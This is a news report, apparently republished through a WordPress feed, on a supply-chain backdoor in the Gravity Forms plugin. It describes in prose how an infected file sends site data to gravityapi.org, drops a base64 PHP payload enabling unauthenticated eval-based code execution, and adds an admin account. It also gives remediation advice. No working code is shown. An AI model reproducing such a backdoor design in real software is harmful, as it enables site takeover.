![\"Wordpress](\"https:\/\/www.bleepstatic.com\/content\/hl-images\/2023\/12\/07\/back-2.jpg\")
<\/p>\n
The popular WordPress plugin Gravity Forms has been compromised in what seems a supply-chain attack where manual installers from the official website were infected with a backdoor.<\/p>\n
Gravity Forms is a premium plugin for creating contact, payment, and other online forms. Based on statistic data from the vendor, the product is isntalled on around one million websites, some belonging to\u00a0well-known organizations\u00a0like Airbnb, Nike, ESPN, Unicef, Google, and Yale.<\/p>\n
Remote code execution on the server<\/h3>\n
WordPress security firm PatchStack says it received a report earlier today about suspicious requests generated by plugins downloaded from the Gravity Forms website.<\/p>\n
After examining the plugin, PatchStack confirmed that it received a malicious file (gravityforms\/common.php)\u00a0downloaded from the vendor’s website. Closer examination revealed that the file\u00a0initiated\u00a0a POST request to a suspicious domain at \u201cgravityapi.org\/sites.\u201d<\/p>\n
Upon further analysis, the researchers found that the plugin collected\u00a0extensive site metadata, including URL, admin path, theme, plugins, and PHP\/WordPress versions, and exfiltrates it to the attackers.<\/p>\n
The server response includes base64-encoded PHP malware, which is saved as \u201cwp-includes\/bookmark-canonical.php.\u201d<\/p>\n
The malware masquerades as WordPress Content Management Tools that enables remote code execution without the need to authenticate using functions like \u2018handle_posts(),\u2019 \u2018handle_media(),\u2019 \u2018handle_widgets().\u2019<\/p>\n
\u201cAll of those functions can be called from __construct -> init_content_management -> handle_requests -> process_request function. So, it basically can be triggered by an unauthenticated user,\u201d Patchstack explains.<\/p>\n
\u201cFrom all of the functions, it will perform an eval call with the user-supplied input, resulting in remote code execution on the server,\u201d the researchers said.<\/p>\n
RocketGenius, the developer behind Gravity Forms,\u00a0was informed of the issue, and a staff member told Patchstack that the malware affected only manual downloads and composer installation of the plugin.<\/p>\n
Patchstack recommends that anyone\u00a0who downloaded Gravity Forms starting\u00a0yesterday reinstall the plugin by getting a clean version. Admins should also scan their websites for any signs of infection.<\/p>\n
According to Patchstack, the domains facilitating this operation were registered on July 8.<\/p>\n
Hackers add admin account<\/h3>\n
RocketGenius has published a post-mortem of the incident confirming that only Gravity Forms 2.9.11.1 and 2.9.12 available for manual download between July 10 and 11 were compromised.<\/p>\n
If admins ran a composer install for version 2.9.11 on any of the two dates, they received an infected copy of the product.<\/p>\n
“The Gravity API service that handles licensing, automatic updates, and the installation of add-ons initiated from within the Gravity Forms plugin was never compromised. All package updates managed through that service are unaffected” –\u00a0RocketGenius<\/p>\n
RocketGenius says that the malicious code blocked update attempts, contacted an external server\u00a0to fetch additional payloads, and added an admin account that gave the attacker complete control of the website.<\/p>\n
The developer also provides methods for administrators to check for possible infection by following specific links on their websites.<\/p>\n
\n ![\"Wordpress](\"https:\/\/www.bleepstatic.com\/c\/w\/wiz\/CDR-Dummies.jpg\")
<\/p>\n
WordPress Cloud Detection & Response for Dummies<\/h2>\n
Contain emerging threats in real time – before they impact your business.<\/p>\n
Learn how cloud detection and response (CDR) gives security teams the edge they need in this practical, no-nonsense guide.<\/p>\n<\/p><\/div>\n<\/div><\/div>\n","protected":false},"excerpt":{"rendered":"
WordPress The popular WordPress plugin Gravity Forms has been compromised in what seems a supply-chain attack where manual installers from<\/p>\n","protected":false},"author":7282,"featured_media":12305,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1166],"tags":[],"class_list":["post-12304","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-website"],"_links":{"self":[{"href":"https:\/\/usaontheweb.com\/clone1\/wp-json\/wp\/v2\/posts\/12304","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/usaontheweb.com\/clone1\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/usaontheweb.com\/clone1\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/usaontheweb.com\/clone1\/wp-json\/wp\/v2\/users\/7282"}],"replies":[{"embeddable":true,"href":"https:\/\/usaontheweb.com\/clone1\/wp-json\/wp\/v2\/comments?post=12304"}],"version-history":[{"count":0,"href":"https:\/\/usaontheweb.com\/clone1\/wp-json\/wp\/v2\/posts\/12304\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/usaontheweb.com\/clone1\/wp-json\/wp\/v2\/media\/12305"}],"wp:attachment":[{"href":"https:\/\/usaontheweb.com\/clone1\/wp-json\/wp\/v2\/media?parent=12304"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/usaontheweb.com\/clone1\/wp-json\/wp\/v2\/categories?post=12304"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/usaontheweb.com\/clone1\/wp-json\/wp\/v2\/tags?post=12304"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}